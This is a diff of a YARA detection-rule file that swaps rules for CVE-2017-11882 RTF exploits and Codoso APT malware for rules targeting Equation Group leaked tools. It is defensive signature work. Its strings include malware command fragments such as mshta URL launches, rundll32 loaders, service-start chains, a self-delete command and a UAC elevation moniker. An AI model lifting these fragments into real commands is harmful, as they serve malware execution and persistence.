+		$op2 = { 14 83 c1 05 80 39 85 75 0c 80 79 01 c0 75 06 80 }
+		$op3 = { eb 3d 83 c0 06 33 f6 80 38 ff 75 2c 80 78 01 15 }
 
 	condition:
-		uint32be( 0 ) == 0x7B5C7274 and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 80KB and ( 4 of ( $s* ) or all of ( $op* ) ) )
 }
-rule SIGNATURE_BASE_CVE_2017_11882_RTF : CVE_2017_11882 FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Sendpktrigger : FILE
 {
 	meta:
-		description = "Detects suspicious Microsoft Equation OLE contents as used in CVE-2017-11882"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "400689ff-e856-5cbf-a7fa-93f6a8d8dbb9"
-		date = "2018-02-13"
+		id = "6cbf95eb-323c-53a3-9aca-222626add4dc"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/exploit_cve_2017_11882.yar#L58-L80"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L2884-L2897"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "729fa8215a24990371369158d4582cc0ba9387eb0e7221860bf7216046c447cb"
-		score = 60
+		logic_hash = "277367e69406a84ff4ff6b57d05bf97468b0083e23f9c5cd14cdd26cad5846d7"
+		score = 75
 		quality = 85
-		tags = "CVE-2017-11882, FILE"
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "2f9c7a857948795873a61f4d4f08e1bd0a41e3d6ffde212db389365488fa6e26"
 
 	strings:
-		$x1 = "4d534854412e4558452068747470"
-		$x2 = "6d736874612e6578652068747470"
-		$x3 = "6d736874612068747470"
-		$x4 = "4d534854412068747470"
-		$s1 = "4d6963726f736f6674204571756174696f6e20332e30" ascii
-		$s2 = "4500710075006100740069006f006e0020004e00610074006900760065" ascii
-		$s3 = "2e687461000000000000000000000000000000000000000000000"
+		$x1 = "----====**** PORT KNOCK TRIGGER BEGIN ****====----" fullword wide
 
 	condition:
-		( uint32be( 0 ) == 0x7B5C7274 or uint32be( 0 ) == 0x7B5C2A5C ) and filesize < 300KB and ( 1 of ( $x* ) or 2 of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them )
 }
-rule SIGNATURE_BASE_EXP_Potential_CVE_2017_11882 : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Dmgz_Target_2 : FILE
 {
 	meta:
-		description = "No description has been set in the source file - Signature Base"
-		author = "ReversingLabs"
-		id = "199710e0-5094-5940-ad29-f01383d5d8c2"
-		date = "2023-12-05"
+		description = "Detects EquationGroup Tool - April Leak"
+		author = "Florian Roth (Nextron Systems)"
+		id = "426e982c-2380-5801-ba80-ab25ec4c0f74"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "https://www.reversinglabs.com/newsroom/news/reversinglabs-yara-rule-detects-cobalt-strike-payload-exploiting-cve-2017-11882.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/exploit_cve_2017_11882.yar#L82-L101"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L2899-L2916"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "ea28010c4de86ce94537f6ab0892f6b9e28b0c775706e38bde20f48bf968d58f"
+		logic_hash = "ab9ab949ee17655e424f6a65d3605e9900d214d1c620e051104762d5c214419f"
 		score = 75
-		quality = 60
+		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "55ac29b9a67e0324044dafaba27a7f01ca3d8e4d8e020259025195abe42aa904"
 
 	strings:
-		$docfilemagic = { D0 CF 11 E0 A1 B1 1A E1 }
-		$equation1 = "Equation Native" wide ascii
-		$equation2 = "Microsoft Equation 3.0" wide ascii
-		$mshta = "mshta"
-		$http = "http://"
-		$https = "https://"
-		$cmd = "cmd" fullword
-		$pwsh = "powershell"
-		$exe = ".exe"
-		$address = { 12 0C 43 00 }
+		$s1 = "\\\\.\\%ls" fullword ascii
+		$op0 = { e8 ce 34 00 00 b8 02 00 00 f0 e9 26 02 00 00 48 }
+		$op1 = { 8b 4d 28 e8 02 05 00 00 89 45 34 eb 07 c7 45 34 }
+		$op2 = { e8 c2 34 00 00 90 48 8d 8c 24 00 01 00 00 e8 a4 }
 
 	condition:
-		uint16( 0 ) == 0xcfd0 and $docfilemagic at 0 and any of ( $mshta , $http , $https , $cmd , $pwsh , $exe ) and any of ( $equation1 , $equation2 ) and $address
+		( uint16( 0 ) == 0x5a4d and filesize < 100KB and all of them )
 }
-rule SIGNATURE_BASE_Codoso_Plugx_3 : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Mstcp32_DXGHLP16_Tdip : FILE
 {
 	meta:
-		description = "Detects Codoso APT PlugX Malware"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "55066812-3a8e-5099-afb4-ff7a59f1ccb2"
-		date = "2016-01-30"
-		modified = "2023-12-05"
-		reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_codoso.yar#L11-L27"
+		id = "5b54e68b-7bf3-59a0-8257-c370a3b9e4db"
+		date = "2017-04-15"
+		modified = "2023-01-06"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L2918-L2938"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "74e1e83ac69e45a3bee78ac2fac00f9e897f281ea75ed179737e9b6fe39971e3"
-		logic_hash = "51615c2583bb672f148f216e4856e7e346b17884f0740d69f6a24f08b594bda4"
+		logic_hash = "35fab86ca4cb287c8046a1764a91523673e12b5729d87c90b0c298dcbfcf86eb"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "26215bc56dc31d2466d72f1f4e1b6388e62606e9949bc41c28968fcb9a9d60a6"
+		hash2 = "fcfb56fa79d2383d34c471ef439314edc2239d632a880aa2de3cea430f6b5665"
+		hash3 = "a5ec4d102d802ada7c5083af53fd9d3c9b5aa83be9de58dbb4fac7876faf6d29"
 
 	strings:
-		$s1 = "Cannot create folder %sDCRC failed in the encrypted file %s. Corrupt file or wrong password." fullword wide
-		$s2 = "mcs.exe" fullword ascii
-		$s3 = "McAltLib.dll" fullword ascii
-		$s4 = "WinRAR self-extracting archive" fullword wide
+		$s1 = "\\Registry\\User\\CurrentUser\\" wide
+		$s2 = "\\DosDevices\\%ws" wide
+		$s3 = "\\Device\\%ws_%ws" wide
+		$s4 = "sys\\mstcp32.dbg" fullword ascii
+		$s5 = "%ws%03d%ws%wZ" fullword wide
+		$s6 = "TCP/IP driver" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1200KB and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 200KB and 4 of them )
 }
-rule SIGNATURE_BASE_Codoso_Plugx_2 : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Regprobe : FILE
 {
 	meta:
-		description = "Detects Codoso APT PlugX Malware"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "0402a0ff-5664-52db-a739-51c5181853f8"
-		date = "2016-01-30"
+		id = "184618b7-a24c-5a8c-9fb2-a5a07f1a0299"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_codoso.yar#L28-L45"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L2940-L2955"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "b9510e4484fa7e3034228337768176fce822162ad819539c6ca3631deac043eb"
-		logic_hash = "5ee652a135d4865340d2ce6421144ec76ccc7ab69704e92904b2e2ebfc72edfc"
+		logic_hash = "01e7387c26ae3736c8fac1a3bb6ff283f8b06949af7a4ac36a556b292412bda2"
 		score = 75
-		quality = 60
+		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "99a42440d4cf1186aad1fd09072bd1265e7c6ebbc8bcafc28340b4fe371767de"
 
 	strings:
-		$s1 = "%TEMP%\\HID" fullword wide
-		$s2 = "%s\\hid.dll" fullword wide
-		$s3 = "%s\\SOUNDMAN.exe" fullword wide
-		$s4 = "\"%s\\SOUNDMAN.exe\" %d %d" fullword wide
-		$s5 = "%s\\HID.dllx" fullword wide
+		$x1 = "Usage: %s targetIP protocolSequence portNo [redirectorIP] [CLSID]" fullword ascii
+		$x2 = "key does not exist or pinging w2k system" fullword ascii
+		$x3 = "RpcProxy=255.255.255.255:65536" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 400KB and 3 of them ) or all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 100KB and 1 of them )
 }
-rule SIGNATURE_BASE_Codoso_Customtcp_4 : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Doublefeaturedll_Dll_2 : FILE
 {
 	meta:
-		description = "Detects Codoso APT CustomTCP Malware"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "b6ed6939-db0c-5a47-8839-3337d1bc1f6c"
-		date = "2016-01-30"
+		id = "f77fd49f-815b-5fb9-a3d7-8721edf79b28"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_codoso.yar#L46-L71"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L2957-L2974"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "fcabbd37acf75e1233894682e77abad95a849ed68c7e8ce2690dde03d8160f8b"
+		logic_hash = "0d6751ebfb2541c86b74583b7867de0a193ca106bf77337c8b10f15cdeb596bd"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "ea67d76e9d2e9ce3a8e5f80ff9be8f17b2cd5b1212153fdf36833497d9c060c0"
-		hash2 = "130abb54112dd47284fdb169ff276f61f2b69d80ac0a9eac52200506f147b5f8"
-		hash3 = "3ea6b2b51050fe7c07e2cf9fa232de6a602aa5eff66a2e997b25785f7cf50daa"
-		hash4 = "02cf5c244aebaca6195f45029c1e37b22495609be7bdfcfcd79b0c91eac44a13"
+		hash1 = "f265defd87094c95c7d3ddf009d115207cd9d4007cf98629e814eda8798906af"
+		hash2 = "8d62ca9e6d89f2b835d07deb5e684a576607e4fe3740f77c0570d7b16ebc2985"
+		hash3 = "634a80e37e4b32706ad1ea4a2ff414473618a8c42a369880db7cc127c0eb705e"
 
 	strings:
-		$x1 = "varus_service_x86.dll" fullword ascii
-		$s1 = "/s %s /p %d /st %d /rt %d" fullword ascii
-		$s2 = "net start %%1" fullword ascii
-		$s3 = "ping 127.1 > nul" fullword ascii
-		$s4 = "McInitMISPAlertEx" fullword ascii
-		$s5 = "sc start %%1" fullword ascii
-		$s6 = "net stop %%1" fullword ascii
-		$s7 = "WorkerRun" fullword ascii
+		$s1 = ".dllfD" fullword ascii
+		$s2 = "Khsppxu" fullword ascii
+		$s3 = "D$8.exe" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 400KB and 5 of them ) or ( $x1 and 2 of ( $s* ) )
+		( uint16( 0 ) == 0x5a4d and filesize < 1000KB and 2 of them )
 }
-rule SIGNATURE_BASE_Codoso_Customtcp_3 : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Gangsterthief_Implant : FILE
 {
 	meta:
-		description = "Detects Codoso APT CustomTCP Malware"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "b6ed6939-db0c-5a47-8839-3337d1bc1f6c"
-		date = "2016-01-30"
+		id = "9127f280-135e-5f83-9587-eab3ad84ad69"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_codoso.yar#L72-L93"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L2976-L2993"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "d66106ec2e743dae1d71b60a602ca713b93077f56a47045f4fc9143aa3957090"
-		logic_hash = "fb486985587fc28c45cbdf6a63550e60e8d6c18f218544adc19c5604193fe8ea"
+		logic_hash = "c8145d6eedf20cf95baf329a6240b5b740273ff0a7f82edd3c346eb8c67e69e1"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "50b269bda5fedcf5a62ee0514c4b14d48d53dd18ac3075dcc80b52d0c2783e06"
 
 	strings:
-		$s1 = "DnsApi.dll" fullword ascii
-		$s2 = "softWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\Domains\\%s" ascii
-		$s3 = "CONNECT %s:%d hTTP/1.1" ascii
-		$s4 = "CONNECT %s:%d HTTp/1.1" ascii
-		$s5 = "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/4.0;)" ascii
-		$s6 = "iphlpapi.dll" ascii
-		$s7 = "%systemroot%\\Web\\" ascii
-		$s8 = "Proxy-Authorization: Negotiate %s" ascii
-		$s9 = "CLSID\\{%s}\\InprocServer32" ascii
+		$s1 = "\\\\.\\%s:" fullword wide
+		$s4 = "raw_open CreateFile error" fullword ascii
+		$s5 = "-PATHDELETED-" ascii
+		$s6 = "(deleted)" fullword wide
+		$s8 = "NULLFILENAME" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 500KB and 5 of them ) or 7 of them
+		( uint16( 0 ) == 0x5a4d and filesize < 300KB and 3 of them )
 }
-rule SIGNATURE_BASE_Codoso_Customtcp_2 : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Setcallbackports : FILE
 {
 	meta:
-		description = "Detects Codoso APT CustomTCP Malware"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "b6ed6939-db0c-5a47-8839-3337d1bc1f6c"
-		date = "2016-01-30"
+		id = "3c06fc74-2e75-5348-bb62-30c724de1414"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_codoso.yar#L94-L114"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L2995-L3009"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "3577845d71ae995762d4a8f43b21ada49d809f95c127b770aff00ae0b64264a3"
-		logic_hash = "a355ac60dca5ca880a90a5c2720690b4691630fd434411758fa7ff006f7389ba"
+		logic_hash = "e087534589228ac1af8b8b8d2ebbc1bc99fc25b38cb4c4d840cab8e90e75644a"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "16f66c2593665c2507a78f96c0c2a9583eab0bda13a639e28f550c92f9134ff0"
 
 	strings:
-		$s1 = "varus_service_x86.dll" fullword ascii
-		$s2 = "/s %s /p %d /st %d /rt %d" fullword ascii
-		$s3 = "net start %%1" fullword ascii
-		$s4 = "ping 127.1 > nul" fullword ascii
-		$s5 = "McInitMISPAlertEx" fullword ascii
-		$s6 = "sc start %%1" fullword ascii
-		$s7 = "B_WKNDNSK^" fullword ascii
-		$s8 = "net stop %%1" fullword ascii
+		$s1 = "USAGE: %s <input file> <output file> <port1> [port2] [port3] [port4] [port5] [port6]" fullword ascii
+		$s2 = "You may enter between 1 and 6 ports to change the defaults." fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 406KB and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 100KB and 1 of them )
 }
-rule SIGNATURE_BASE_Codoso_PGV_PVID_6 : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Diba_Target_BH_2000 : FILE
 {
 	meta:
-		description = "Detects Codoso APT PGV_PVID Malware"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "6d1d8490-fdcb-5263-ae00-0b436e822fc3"
-		date = "2016-01-30"
+		id = "b02fa407-e6f1-5c2d-a587-7edb55dbe0a5"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_codoso.yar#L115-L129"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L3011-L3025"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "4b16f6e8414d4192d0286b273b254fa1bd633f5d3d07ceebd03dfdfc32d0f17f"
-		logic_hash = "0907274bd6c97b7d7b2913e42aa748c92012aeeb32196ddcbcd30332f4e95ac9"
+		logic_hash = "0cd3ba351b1c5716ed322c9f177a848322324526f3d39c2be5cc34bc6aee9fa6"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "0654b4b8727488769390cd091029f08245d690dd90d1120e8feec336d1f9e788"
 
 	strings:
-		$s0 = "rundll32 \"%s\",%s" fullword ascii
-		$s1 = "/c ping 127.%d & del \"%s\"" fullword ascii
+		$s2 = "0M1U1Z1p1" fullword ascii
+		$s14 = "SPRQWV" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 6000KB and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 2000KB and all of them )
 }
-rule SIGNATURE_BASE_Codoso_Gh0St_3 : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Rc5 : FILE
 {
 	meta:
-		description = "Detects Codoso APT Gh0st Malware"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "55fb17c5-ee11-55be-9af3-e9fe8d6160b5"
-		date = "2016-01-30"
+		id = "854c1726-4ba4-5464-a765-4dd154a1b166"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_codoso.yar#L130-L151"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L3027-L3043"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "bf52ca4d4077ae7e840cf6cd11fdec0bb5be890ddd5687af5cfa581c8c015fcd"
-		logic_hash = "e24d434d8f08b83f8e4b1f4aa75a84a040e4f56cdbd9a58ff49c463437e78c24"
+		logic_hash = "6d9ba73fe2a6da99ba44b00bcb5ecf51e983ac245fd5c6e620d35e8120514464"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "69e2c68c6ea7be338497863c0c5ab5c77d5f522f0a84ab20fe9c75c7f81318eb"
 
 	strings:
-		$x1 = "RunMeByDLL32" fullword ascii
-		$s1 = "svchost.dll" fullword wide
-		$s2 = "server.dll" fullword ascii
-		$s3 = "Copyright ? 2008" fullword wide
-		$s4 = "testsupdate33" fullword ascii
-		$s5 = "Device Protect Application" fullword wide
-		$s6 = "MSVCP60.DLL" fullword ascii
-		$s7 = "mail-news.eicp.net" fullword ascii
+		$s1 = "Usage: %s [d|e] session_key ciphertext" fullword ascii
+		$s2 = "where session_key and ciphertext are strings of hex" fullword ascii
+		$s3 = "d = decrypt mode, e = encrypt mode" fullword ascii
+		$s4 = "Bad mode, should be 'd' or 'e'" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 195KB and $x1 or 4 of them
+		( uint16( 0 ) == 0x5a4d and filesize < 200KB and 2 of them )
 }
-rule SIGNATURE_BASE_Codoso_Gh0St_2 : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_PC_Level_Generic : FILE
 {
 	meta:
-		description = "Detects Codoso APT Gh0st Malware"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "5643d028-2a76-5bce-bf2f-8be706ab1fd5"
-		date = "2016-01-30"
+		id = "7ff3d0b0-7a70-561e-9c45-d1f9dbccefe9"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_codoso.yar#L152-L170"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L3045-L3075"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841"
-		logic_hash = "5864e52820578769a31a6925795d13283d7b3bc5f9ac50ac8aea6578a5919e71"
+		logic_hash = "ddb3441b62b477ab7e3406a22e2a246b60c1d1d25e4acf52ee452a2dfac2daf7"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "7a6488dd13936e505ec738dcc84b9fec57a5e46aab8aff59b8cfad8f599ea86a"
+		hash2 = "0e3cfd48732d0b301925ea3ec6186b62724ec755ed40ed79e7cd6d3df511b8a0"
+		hash3 = "d1d6e3903b6b92cc52031c963e2031b5956cadc29cc8b3f2c8f38be20f98a4a7"
+		hash4 = "25a2549031cb97b8a3b569b1263c903c6c0247f7fff866e7ec63f0add1b4921c"
+		hash5 = "591abd3d7ee214df25ac25682b673f02219da108d1384261052b5167a36a7645"
+		hash6 = "6b71db2d2721ac210977a4c6c8cf7f75a8f5b80b9dbcece1bede1aec179ed213"
+		hash7 = "7be4c05cecb920f1010fc13086635591ad0d5b3a3a1f2f4b4a9be466a1bd2b76"
+		hash8 = "f9cbccdbdf9ffd2ebf1ee84d0ddddd24a61dbe0858ab7f0131bef6c7b9a19131"
+		hash9 = "3cf7a01bdf8e73769c80b75ca269b506c33464d81f574ded8bb20caec2d4cd13"
+		hash10 = "a87a871fe32c49862ed68fda99d92efd762a33ababcd9b6b2b909f2e01f59c16"
 
 	strings:
-		$s0 = "cmd.exe /c ping 127.0.0.1 && ping 127.0.0.1 && sc start %s && ping 127.0.0.1 && sc start %s" fullword ascii
-		$s1 = "rundll32.exe \"%s\", RunMeByDLL32" fullword ascii
-		$s13 = "Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}" fullword wide
-		$s14 = "%s -r debug 1" fullword ascii
-		$s15 = "\\\\.\\keymmdrv1" fullword ascii
-		$s17 = "RunMeByDLL32" fullword ascii
+		$s1 = "wshtcpip.WSHGetSocketInformation" fullword ascii
+		$s2 = "\\\\.\\%hs" fullword ascii
+		$s3 = ".?AVResultIp@Mini_Mcl_Cmd_NetConnections@@" fullword ascii
+		$s4 = "Corporation. All rights reserved." fullword wide
+		$s5 = { 49 83 3c 24 00 75 02 eb 5d 49 8b 34 24 0f b7 46 }
+		$op1 = { 44 24 57 6f c6 44 24 58 6e c6 44 24 59 }
+		$op2 = { c6 44 24 56 64 88 5c 24 57 }
+		$op3 = { 44 24 6d 4c c6 44 24 6e 6f c6 44 24 6f }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 500KB and 1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 400KB and ( 2 of ( $s* ) or all of ( $op* ) )
 }
-rule SIGNATURE_BASE_Codoso_Customtcp : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_PC_Level3_Http_Exe : FILE
 {
 	meta:
-		description = "Codoso CustomTCP Malware"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "b6ed6939-db0c-5a47-8839-3337d1bc1f6c"
-		date = "2016-01-30"
+		id = "9bb4224e-f900-5f5c-8091-088a4b791ada"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_codoso.yar#L171-L188"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L3077-L3094"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "b95d7f56a686a05398198d317c805924c36f3abacbb1b9e3f590ec0d59f845d8"
-		logic_hash = "4f0333de25b9f84ecaa3e63c5f600f53929244cd63a681d21cb78cfe17ca15f9"
+		logic_hash = "50d83b157c338830eea6aba2e09e9d513dd5b50e257d1a16c0d51616bfa26a7f"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "3e855fbea28e012cd19b31f9d76a73a2df0eb03ba1cb5d22aafe9865150b020c"
 
 	strings:
-		$s4 = "wnyglw" fullword ascii
-		$s5 = "WorkerRun" fullword ascii
-		$s7 = "boazdcd" fullword ascii
-		$s8 = "wayflw" fullword ascii
-		$s9 = "CODETABL" fullword ascii
+		$s1 = "Copyright (C) Microsoft" fullword wide
+		$op1 = { 24 39 65 c6 44 24 3a 6c c6 44 24 3b 65 c6 44 24 }
+		$op2 = { 44 24 4e 41 88 5c 24 4f ff }
+		$op3 = { 44 24 3f 6e c6 44 24 40 45 c6 44 24 41 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 405KB and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 400KB and all of them )
 }
-rule SIGNATURE_BASE_Codoso_PGV_PVID_5 : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Parsecapture : FILE
 {
 	meta:
-		description = "Detects Codoso APT PGV PVID Malware"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "0202d82c-c1f8-59f7-96b6-b21f21c1dc69"
-		date = "2016-01-30"
+		id = "11743260-c5ce-59de-9fcf-0c050eee98ff"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks"
